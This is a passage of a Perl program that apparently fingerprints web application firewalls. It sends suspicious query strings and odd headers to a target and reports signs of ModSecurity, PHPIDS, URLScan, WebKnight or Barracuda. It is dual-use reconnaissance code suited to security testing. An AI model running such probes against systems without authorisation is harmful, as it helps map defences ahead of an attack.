                        }        
                        else {
                                $barometerString = "|  |\n" . $barometerString;
                        }
                }

                $barometerString = "----\n" . $barometerString;
                $barometerString .= "----\n";
                print $barometerString;
        }
        else {
                print 'Invalid Percentage, something went wrong during Phase One.';
        }
}


#
# starts the fingerprint process
# this method starts all phases and prints the results
#
# first argument is a single or an array of URLs
#
sub fingerprintTarget ( $ ) {
        my @tempInput;
        my $input = $_[0];
        my $tempUrl;
        my ( $testStringsCount, $successfulCount, $percentage, $url, $path, $nonexistingReturnCode, $resultPhaseOne, $resultPhaseTwo );
        
        if ( !ref($input) ) {
                push(@tempInput, $input);
                $input = \@tempInput;
        }
        
        foreach (@{$input}){
                
                # define a URL
                $url = URI->new($_);

                checkForValidHTTPUrl($url);
                
                #delete anchor
                $tempUrl = $url->as_string();
                $tempUrl =~ s/#+.*//;
                $url = URI->new($tempUrl);
                
                # preparing URI to prevent errors by cleaning unnecessary trailing slash
                $path = $url->path();
                if ( ( $path eq '/' ) && ( $url->as_string() =~ m/.*\Q$path\E$/ ) ) {
                        $url->path('');
                }
                
                print("############# FINGERPRINTING ###############\n\n");
                print("----- $url -----\n\n");
                ######## <PHASE ZERO> ############
                print("# PHASE ZERO\n=========================================\n");
                $nonexistingReturnCode = fpPhaseZero($url);
                if ( $nonexistingReturnCode eq $NO_RESPONSE_STRING ) {
                        print "A $NO_RESPONSE_STRING error occured during phase zero.\n";
                }
                else {
                        print "The Server returned the following code for a non existing url containing the \"bad file\" $PHASE_ZERO_BADSTRING: $nonexistingReturnCode \n";
                        print('That is ' . (( $nonexistingReturnCode eq '404' ) ? 'the normal behaviour.' : 'an abnormal behaviour and an indication for a WAF!') . "\n");
                }
                print("\n\n\n");
                ######## </PHASE ZERO> ############


                ######## <PHASE ONE> ############
                print("# PHASE ONE\n=========================================\n");
                print("This phase checks the response behaviour for specific strings that are known to cause the corresponding WAF to react.\n");
                print("A Percentage of 100% somewhere is a good indication that the corresponding WAF is recognized.\n");
                print(qq(The $GENERAL tests have the purpose to check if there is a WAF at all by sending "really bad" strings.\n));
                print("A Percentage greater than 0% somewhere is a good indication that a WAF is installed.\n");
                print("\n\n");

                $resultPhaseOne = fpPhaseOne($url);

                print(  "####### CAUTION:\n" . 
                        "####### The base Request with the given URL seems to lead to a PHPIDS reaction what may lead to False Positives.\n" . 
                        "####### Maybe the given URL contains \"bad strings\".\n") if $resultPhaseOne->{$BASE_PHPIDS_CHECK_STRING};
                
                print(  "####### CAUTION:\n" . 
                        "####### The base Request with the given URL seems to lead to an empty HTTP Response what may lead to False Positives.\n" . 
                        "####### Maybe the given URL contains \"bad strings\".\n") if $resultPhaseOne->{$BASE_EMPTY_HTTP_RESPONSE_CHECK_STRING};
                
                
                foreach my $key (keys %waf_FP_stringArrays){
                        $testStringsCount = @{$waf_FP_stringArrays{$key}};
                        $successfulCount = $resultPhaseOne->{$key}{$SUCCESSFUL_TESTS_STRING};
                        
                        print $key . "\n---------------\n";
                        if ( $successfulCount ne $NO_RESPONSE_STRING ) {
                                $percentage = int( ( $successfulCount / $testStringsCount ) * 100 );
                                print(  "## At least a third Status Code was observed during this scan. This is unusual behaviour and maybe a False Positive.\n",
                                        "## The Reason could be either Internal Server Errors  or a WAF responding with multiple Status Codes.\n",
                                        "## Try verbose mode to verify and maybe a different URL to fix the problem, if it's not a WAF reaction.\n") if $resultPhaseOne->{$key}{$MULTIPLE_RETURNCODES_DISCOVERED_STRING};
                                print("\n");
                                print("$successfulCount of $testStringsCount teststrings caused the WAF to react, meaning a percentage of $percentage%.\n\n");
                                printPercentageBar($percentage);
                                print "\n\n";
                        }
                        else {
                                print "Something went wrong with the " . $key . " Phase One.\n";
                        }
                }
                print("\n\n\n");
                ######## </PHASE ONE> ############

                ######## <PHASE TWO> ############
                print("# PHASE TWO\n=========================================\n");
                print("This phase does specific checks, representing some specialities for each WAF.\n");
                print("These are a good method to verify the results from phase two.\n");
                print("\n\n");

                $resultPhaseTwo = fpPhaseTwo($url);

                foreach my $key (keys %{$resultPhaseTwo}) {
                        print $key . "\n---------------\n";
                        printArray($resultPhaseTwo->{$key});
                        print "\n\n";
                }
                ######## </PHASE TWO> ############
        }
}

# 
# checks if request for not existing file containing "bad filename" does return different code than 404
#
# input is the URL that should be tested
# returns the Status Code or CONNECTION_DROPPED if the connection has been closed by the server
#
sub fpPhaseZero ( $ ) {
        my $url = $_[0];

        my $badStringUrl = getURLWithRandomPath($url)->as_string() . "$PHASE_ZERO_BADSTRING";

        my $response = getUrl(URI->new($badStringUrl));
        return ( $response eq $CONNECTION_DROPPED ) ? $CONNECTION_DROPPED : getResponseCode($response);
}


#
# returns a random URL Path
#
# first argument is an URL object
#
sub getURLWithRandomPath ( $ ) {
        my $url = $_[0];

        my $randNonexistentSite = $url->as_string();
        if ( $url->path() ) {
                my $urlPath = $url->path();
                $randNonexistentSite =~ s/\Q$urlPath\E.*$//;
        }
        $randNonexistentSite .= '/';

        for (my $i = 0; $i < 10; $i++) {
                $randNonexistentSite .= chr(int(rand(26))+97);
                $randNonexistentSite .= '/' if ($i == 3);
        }
        $randNonexistentSite .= '/';
print("$randNonexistentSite\n\n\n");
        return URI->new($randNonexistentSite);
}


#
# this phase checks the response behaviour for specific strings that are known to cause the corresponding waf to react
# returns a hash with the number of successful waf reactions for each waf string array
# or $NO_RESPONSE_STRING on error
#
# first argument is the URL that should be tested
#
sub fpPhaseOne ( $ ) {
        my $url = $_[0];
        my $successfulTests = 0;        #successful means the string caused an reaction of the waf
        my ( $queryString, $uri, $baseResponseCode, $baseResponseMessage, $baseResponseServerstring, $baseResponse, $baseResponseBody, $currentResponse, $currentResponseCode, $currentResponseMessage, $currentResponseBody, $currentResponseServerstring, $basePhpidsCheckResult, $baseEmptyResponseCheckResult, $currentPhpidsCheckResult, $currentEmptyResponseCheckResult, $firstDifferentResponseCode, $multipleResponseCodesDetected);
        my %result;
        my $urlHostPart = $url->scheme() . '://' . $url->host() . ':' . $url->port();
        $urlHostPart .= $url->path() ? $url->path() : '/';
        my $noResponse = false;

        if ( $url->query() ) {
                $queryString = '?' . $url->query();
                $queryString =~ s/=.*/=/;
        }
        else {
                $queryString = '?asd=';
        }
        
        $uri = $urlHostPart . $queryString;

        $baseResponse = getUrl(URI->new($uri), 'bb');
        $baseResponseCode = getResponseCode($baseResponse);
        $baseResponseServerstring = getResponseServerstring($baseResponse);
        $baseResponseMessage = getResponseMessage($baseResponse);
        $baseResponseBody = getResponseBody($baseResponse);
        $basePhpidsCheckResult = checkForPhpids($baseResponse);
        $baseEmptyResponseCheckResult = checkForEmptyHTTPResponse($baseResponse);

        if ( $VERBOSE_MODE ) {
                print("\n####### VERBOSE MODE OUTPUT #######\n");
                print("Base Response:\n");
                print('Base Request URL: ', $uri, "bb\n");
                print("Base Status Code: $baseResponseCode\n");
                print("Base Status Message: $baseResponseMessage\n");
                print("Result for $PHPIDS Check on Base Request: ", $basePhpidsCheckResult ? 
                        'Reaction detected (unexpected behaviour, maybe request url contains "bad strings"?' : 'No reaction detected (that is the expected behaviour)', "\n");
                print('Result for empty HTTP Response Check on Base Request: ', $baseEmptyResponseCheckResult ? 
                        'Reaction detected (unexpected behaviour, maybe request url contains "bad strings"?' : 'Non empty Answer (that is the expected behaviour)', "\n");
        }
        foreach my $key (keys %waf_FP_stringArrays) {
                $successfulTests = 0;
                $noResponse = false;
                
                foreach my $currentString (@{$waf_FP_stringArrays{$key}}) {

                        $currentResponse = getUrl(URI->new($uri), $currentString);

                        $currentResponseCode = getResponseCode($currentResponse);
                        $currentResponseMessage = getResponseMessage($currentResponse);
                        $currentResponseServerstring = getResponseServerstring($currentResponse);
                        $currentPhpidsCheckResult = checkForPhpids($currentResponse);
                        $currentEmptyResponseCheckResult = checkForEmptyHTTPResponse($baseResponse);
                        
                        if ( $currentResponseCode eq $NO_RESPONSE_STRING ) {
                                $noResponse = true;
                                last;
                        }
                        elsif ( ( $currentResponseCode ne $baseResponseCode ) || ( $currentResponse eq $CONNECTION_DROPPED ) ) {
                                $firstDifferentResponseCode = $currentResponseCode if not $firstDifferentResponseCode;
                                $multipleResponseCodesDetected = true if ( $currentResponseCode ne $firstDifferentResponseCode );
                                $successfulTests++;
                        }
                        elsif ( ( $baseResponseMessage ne $currentResponseMessage )
                                || ( $baseResponseServerstring ne $currentResponseServerstring ) 
                                || ( $currentPhpidsCheckResult ) || ( $currentEmptyResponseCheckResult ) ) {
                                $successfulTests++;
                        }
                        
                        if ( $VERBOSE_MODE ) {
                                print"\n";
                                print("$key Test:\n");
                                print('Request URL: ' . $urlHostPart . $queryString . $currentString . "\n");
                                print("Status Code: $currentResponseCode\n");
                                print("Status Message: $currentResponseMessage\n");
                                print("Result for $PHPIDS Check: ", $currentPhpidsCheckResult ? 'Reaction Detected' : 'No Reaction detected.', "\n");
                                print('Result for empty HTTP Response Check: ', $currentEmptyResponseCheckResult ? 'Reaction Detected' : 'No Reaction detected.', "\n");
                                print"\n";
                        }
                }

                
                $result{$key}{$SUCCESSFUL_TESTS_STRING} = $noResponse ? $NO_RESPONSE_STRING : $successfulTests;
                $result{$key}{$MULTIPLE_RETURNCODES_DISCOVERED_STRING} = $multipleResponseCodesDetected;
                
                $multipleResponseCodesDetected = false;
        }
        
        $result{$BASE_PHPIDS_CHECK_STRING} = $basePhpidsCheckResult;
        $result{$BASE_EMPTY_HTTP_RESPONSE_CHECK_STRING} = $baseEmptyResponseCheckResult;
        
        print "####### END VERBOSE MODE OUTPUT #######\n\n" if $VERBOSE_MODE;

        return \%result;
}


#
# Experimental check. There is no PHPIDS default response behaviour as it has to be implemented by the programmer.
# This method tries to identify phpids by checking the response for the PHPIDS Result output
# returns true if the check is successful
#
# first arguemnt has to be a complete HTTP response
#
sub checkForPhpids ( $ ) {
        my $body = getResponseBody($_[0]);
        
        return ( ( $body =~ m/Total impact/ ) && ( $body =~ m/Affected tags/ ) );
}


#
# This method checks, if the Server Response contains only the Server header but no data
#
# expects a complete HTTP response as input
# returns true if the check is successful
#
sub checkForEmptyHTTPResponse ( $ ) {
        my $body = getResponseBody($_[0]);
        
        return ( $body eq '' );
}


#
# This method tries to identify Barracuda WAFs by checking the response for a specific error page comment
#
# expects a complete HTTP response as input
# returns true if the check is successful
#
sub checkForBarracuda ( $ ) {
        my $body = getResponseBody($_[0]);
        my $barracudaErrorCommentRegexString = '<!--0123456789.*-->';
        
        return ( $body =~ m/$barracudaErrorCommentRegexString/i );
}


#
# this method processes an HTTP GET Request and returns a string containing the response
# or $CONNECTION_DROPPED on failure
#
# first argument is the URI Object that should be requested
# second argument is optional; a string that will be used as paramter value in the querystring
# 
# the use of the second parameter provides the possibility to circumvent the fact, 
# that some characters will be automatically URL Encoded, inside the URI object
#
sub getUrl ( $@ ) {
        my $url = $_[0];
        checkForValidHTTPUrl($url);
        
        my $additionalString = $_[1] if $_[1];
        my $data = '';
        my ( $tcpHost, $tcpPort, $getString, $connectionString );
        my $getHost = $url->host();
        my $getPort = $url->port();
        if ( $HTTP_PROXY ) {
                $tcpHost = $HTTP_PROXY->host();
                $tcpPort = $HTTP_PROXY->port();
                $connectionString = "Proxy-Connection: close\r\n";
                $getString = $url->as_string();
                if ( $additionalString ) {
                        $getString =~ s/=.*/=/;
                        $getString .= $additionalString ;
                }
        }
        else {
                $tcpHost = $url->host();
                $tcpPort = $url->port();
                $getString = $url->path() ? $url->path() : '/';
                $getString .= '?' . $url->query() if ($url->query);
                $getString .= $additionalString if $additionalString;
        }

        my $socket = new IO::Socket::INET (
                PeerAddr => $tcpHost,
                PeerPort => $tcpPort,
                Proto => 'tcp',
        ) or die "ERROR in Socket Creation to Host:$tcpHost and Port:$tcpPort   Reason: $!\n";

        print $socket "GET $getString HTTP/1.1\r\n";
        print $socket "Host: $getHost:$getPort\r\n";
        if ( $_[2] ) {
                print $socket $_[2];
        }
        else {
                print $socket $BASIC_USER_AGENT_STRING;
                print $socket $BASIC_ACCEPT_STRING;
        }
        print $socket $connectionString if $connectionString;
        print $socket "Connection: close\r\n";
        print $socket "\r\n";

        my @ready = IO::Select->new($socket)->can_read(4);
        if (@ready) {
                while ( <$socket> ) { $data .= $_}
        }
        $socket->close();
        
        return $data ? $data : $CONNECTION_DROPPED;
}


#
# returns the HTTP Status Code of the given Request
#
# first argument should be a string, containing at least the HTTP Response Header
#
sub getResponseCode ( $ ) {
        my $data = getResponseHeader($_[0]);
        return $CONNECTION_DROPPED if ( $data eq $CONNECTION_DROPPED );
        
        $data =~ m/^.*? (\b\d\d\d\b)/;
        return $1 ? $1 : $NO_RESPONSE_STRING;
}


#
# returns the HTTP Status Message of the given Request
#
# first argument should be a string, containing at least the HTTP Response Header
#
sub getResponseMessage ( $ ) {
        my $data = getResponseHeader($_[0]);
        return $CONNECTION_DROPPED if ( $data eq $CONNECTION_DROPPED );
        
        $data =~ m/^.*?\b\d\d\d\b (.*?)\r\n/;
        return $1 ? $1 : $NO_RESPONSE_STRING;
}


#
# returns the Server String of the given Request
#
# first argument should be a string, containing at least the HTTP Response Header
#
sub getResponseServerstring ( $ ) {
        my $data = getResponseHeader($_[0]);
        return $CONNECTION_DROPPED if ( $data eq $CONNECTION_DROPPED );
        
        $data =~ m/Server: (.*?)\r\n/;
        return $1 ? $1 : $NO_RESPONSE_STRING;
}


#
#
#
sub getResponseBody ( $ ) {
        my $data = $_[0];
        return $CONNECTION_DROPPED if ( $data eq $CONNECTION_DROPPED );
        
        if ( $data =~ m/\r\n\r\n/ ) {
                $data =~ s/^.*?\r\n\r\n//s;          # by appending the modifier 's' the dot includes also whitespace characters
                return $data;
        }
        else {
                return $NO_RESPONSE_STRING;
        }
}


#
# returns the complete HTTP Response Header for the given Request
#
# first argument should be a string, containing the complete HTTP Response
#
sub getResponseHeader ( $ ) {
        my $data = $_[0];
        return $CONNECTION_DROPPED if ( $data eq $CONNECTION_DROPPED );
        
        $data =~ m/^(.*?\r\n\r\n)/s;           # by the modifier 's' the dot includes also whitespace characters
        return $1 ? $1 : $NO_RESPONSE_STRING;
}


#
# checks if the given url is a URI::http(s) object and terminates the script if not
#
# input is an URI object of the url that should be tested
#
sub checkForValidHTTPUrl ( $ ) {
        my $url = $_[0];
        die 'The URL given is not valid: ' . $url->as_string() if !( ( $url->isa('URI::http') ) || ( $url->isa('URI::https') ) );
}


#
# the "special" phase, which scans for "special" behaviour of certain WAFs
#
# input is an URI object of the url that should be tested
#
sub fpPhaseTwo ( $ ) {
        my $url = $_[0];
        my %result;

        $result{$MODSEC} = specialities_modsec($url);
        $result{$PHPIDS} = specialities_phpids($url);
        $result{$URLSCAN} = specialities_urlscan($url);
        $result{$WEBKNIGHT} = specialities_webknight($url);
        $result{$BARRACUDA} = specialities_barracuda($url);
        return \%result;
}


#
# performs checks who are typical for ModSecurity
#
# input is an URI object of the url that should be tested
# returns a string array containing the results
#
sub specialities_modsec ( $ ) {
        my @resultStringArray;
        my $url = $_[0];
        my $result = '';
        my $header = "User-Agent: libwww\r\n";
        my $i = 1;
        
        my $responseCode = getResponseCode(getUrl($url, 0, $header));
        
        $header .= "Accept: a\r\n";

        $result = "The result for Test $i (different behaviour for modified Header fields):\n";
        $i++;

        if ( $responseCode eq getResponseCode(getUrl($url, 0, $header)) ) {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING;
                $result .= $NO_SPECIAL_BEHAVIOUR_DETECTED . "\n";
        }
        else {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING_POSITIVE;
                $result .= "The responses differed for this test, representing a typical unique $MODSEC behaviour.\n";
        }
        push (@resultStringArray, $result);
        $result = '';

        return \@resultStringArray;
        
}


#
# performs checks who are typical for PHPIDS
#
# input is an URI object of the url that should be tested
# returns a string array containing the results
#
sub specialities_phpids ( $ ) {
        my $url = $_[0];
        my $result = '';
        my @resultStringArray;

        my $baseResponse = getUrl($url);
        #~ my $baseResponseCode = getResponseCode($baseResponse);
        my $baseResponseCode = '404';
        my $baseResponseServerstring = getResponseServerstring($baseResponse);
        
        my $badUrl = getURLWithRandomPath($url)->as_string() . "$general_FP_strings[0]";
        
        my $currentResponse = getUrl(URI->new($badUrl));
        my $currentResponseCode = getResponseCode($currentResponse);
        my $currentResponseServerstring = getResponseServerstring($currentResponse);
        my $i = 1;

        $result = "The result for Test $i (Modification in Status Code and Serverstring):\n";
        $i++;

        if ( ( $baseResponseCode eq $currentResponseCode ) && ( $baseResponseServerstring eq $currentResponseServerstring ) && ( !checkForBarracuda($currentResponse) ) ) {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING_POSITIVE;
                $result .= qq(The Status Code and Serverstring didn't change for a "very bad" string on a global basis.\n);
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING;
                $result .= "This could be for one of the following reasons:\n";
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING . $SPECIALITIES_RESULT_SEPERATOR_STRING;
                $result .= "There is no WAF at all.\n";
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING . $SPECIALITIES_RESULT_SEPERATOR_STRING;
                $result .= "There is a WAF that responds with a Status Code of $baseResponseCode.\n";
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING . $SPECIALITIES_RESULT_SEPERATOR_STRING;
                $result .= "This represents $PHPIDS behaviour, as $PHPIDS doesn't filter on a global basis.\n";
        }
        else {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING;
                $result .= $NO_SPECIAL_BEHAVIOUR_DETECTED . "\n";
        }
        push(@resultStringArray, $result);
        
        return \@resultStringArray;
}


#
# performs checks who are typical for URLScan
#
# input is an URI object of the url that should be tested
# returns a string array containing the results
#
sub specialities_urlscan {
        my @resultStringArray;
        my $url = $_[0];
        my $result = '';
        my $i = 1;
        my $baseResponse = getUrl($url);
        my $baseResponseCode = getResponseCode($baseResponse);
        my $header = $BASIC_USER_AGENT_STRING . $BASIC_ACCEPT_STRING;
        
        $header .= "If: \r\n";
        $header .= "Translate: \r\n";
        $header .= "Lock-Token: \r\n";

        $result = "The result for Test $i (different behaviour for additional Header fields 'If:' and others):\n";
        $i++;

        if ( $baseResponseCode eq getResponseCode(getUrl($url, 0, $header)) ) {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING;
                $result .= $NO_SPECIAL_BEHAVIOUR_DETECTED . "\n";
        }
        else {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING_POSITIVE;
                $result .= "The responses differed for this test, representing a typical unique $URLSCAN behaviour.\n";
        }
        push (@resultStringArray, $result);
        $result = '';

        return \@resultStringArray;
}


#
# performs checks that cause special behaviour by WebKnight
#
# input is an URI object of the url that should be tested
# returns a string array containing the results
#
sub specialities_webknight ( $ ) {
        my $url = $_[0];
        my $result = '';
        my @resultStringArray;
        $url->path('/');
        $url->query("asd=$general_FP_strings[0]");
        my $data = getUrl($url);
        my $code = getResponseCode($data);
        my $message = getResponseMessage($data);
        my $serverString = getResponseServerstring($data);
        my $body = getResponseBody($data);
        my $i = 1;

        $result = "The result for Test $i ($WEBKNIGHT specific Status Code):\n";
        $i++;

        if ( ( $code eq '999' ) || ( $message =~ m/no hacking/i ) ) {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING_POSITIVE;
                $result .= "The Status Code/message contains $WEBKNIGHT specific data: $code $message\n";
        }
        else {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING;
                $result .= $NO_SPECIAL_BEHAVIOUR_DETECTED . "\n";
        }
        push(@resultStringArray, $result);

        $result = qq(The result for Test $i ($WEBKNIGHT specific "Server" Headerfield):\n);
        $i++;

        if ( ( $serverString =~ m/webknight/i ) || ( $serverString =~ m/www server/i ) ) {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING_POSITIVE;
                $result .= qq(The "Server" Headerfield contains $WEBKNIGHT specific data: $serverString\n);
        }
        else {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING;
                $result .= $NO_SPECIAL_BEHAVIOUR_DETECTED . "\n";
        }
        push(@resultStringArray, $result);

        $result = qq?The result for Test $i (The $WEBKNIGHT "denied" site):\n?;
        $i++;

        if ( ( $body =~ m/webknight/i ) && ( $body =~ m/triggered an alert/i ) ) {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING_POSITIVE;
                $result .= "The Response Body contains $WEBKNIGHT specific strings.\n";
        }
        else {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING;
                $result .= $NO_SPECIAL_BEHAVIOUR_DETECTED . "\n";
        }
        push(@resultStringArray, $result);
        
        $url->query('asd=');
        my $code1 = getResponseCode(getUrl($url, '"<>'));
        $url->query('asd="<>');                 # the query method URL encodes " < >
        my $code2 = getResponseCode(getUrl($url));

        $result = "The result for Test $i (Different behaviour for the encoded/non encoded version of specific strings):\n";
        $i++;

        if ( $code1 ne $code2 ) {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING_POSITIVE;
                $result .= "The Status Codes differed for the different encoded strings, representing a typical unique $WEBKNIGHT behaviour.\n";
        }
        else {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING;
                $result .= $NO_SPECIAL_BEHAVIOUR_DETECTED . "\n";
        }
        push(@resultStringArray, $result);

        
        return \@resultStringArray;
}


#
# performs checks that cause special behaviour by Barracuda WAF
#
# input is an URI object of the url that should be tested
# returns a string array containing the results
#
sub specialities_barracuda ( $ ) {
        my $url = $_[0];
        my $result = '';
        my @resultStringArray;
        
        my $baseResponse = getUrl($url);
        my $baseResponseCode = getResponseCode($baseResponse);
        my $baseResponseBody = getResponseBody($baseResponse);
        
        $url->path('/');
        $url->query("asd=$general_FP_strings[0]");
        my $response = getUrl($url);
        my $code = getResponseCode($response);
        my $i = 1;

        $result = "The result for Test $i ($BARRACUDA specific Response Page):\n";
        $i++;

        if ( ( $baseResponseCode ne $code ) && ( !checkForBarracuda($baseResponse) ) && ( checkForBarracuda($response) ) ) {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING_POSITIVE;
                $result .= "The Response Page contains an HTML comment that is specific for $BARRACUDA\n";
        }
        else {
                $result .= $SPECIALITIES_RESULT_SEPERATOR_STRING;
                $result .= $NO_SPECIAL_BEHAVIOUR_DETECTED . "\n";
        }
        push(@resultStringArray, $result);
        
        return \@resultStringArray;
}


init();

